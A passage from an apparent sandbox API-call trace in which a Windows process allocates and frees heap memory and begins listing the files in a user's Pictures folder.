Size=0x10) returned 0x2aaa8e8 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.543] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0208.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0208.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aaa978 [0208.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aaa978, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0208.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f8a0 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9d8 [0208.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Pictures", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x19) returned 0x2a77af8 [0208.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Pictures", cchWideChar=25, lpMultiByteStr=0x2a77af8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Pictures", lpUsedDefaultChar=0x0) returned 25 [0208.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5ed00 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0208.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77be8, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5eb00 [0208.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77be8, cbMultiByte=25, lpWideCharStr=0x2a5eb00, cchWideChar=25 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Pictures") returned 25 [0208.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f8a0 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0208.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0208.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.546] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.546] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.546] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0208.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f7120 [0208.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f7120, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74a50 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0208.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0208.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a72238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0208.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.548] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.549] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a2e64ee, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a2e64ee, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e1bf8 [0208.549] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a2e64ee, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a2e64ee, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0208.549] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1f7750, ftCreationTime.dwHighDateTime=0x1d5d4b5, ftLastAccessTime.dwLowDateTime=0xb3112770, ftLastAccessTime.dwHighDateTime=0x1d5cec6, ftLastWriteTime.dwLowDateTime=0xb3112770, ftLastWriteTime.dwHighDateTime=0x1d5cec6, nFileSizeHigh=0x0, nFileSizeLow=0x17ec3, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="5aASoDBkD4Ug.bmp", cAlternateFileName="5AASOD~1.BMP")) returned 1 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0208.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69c10 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 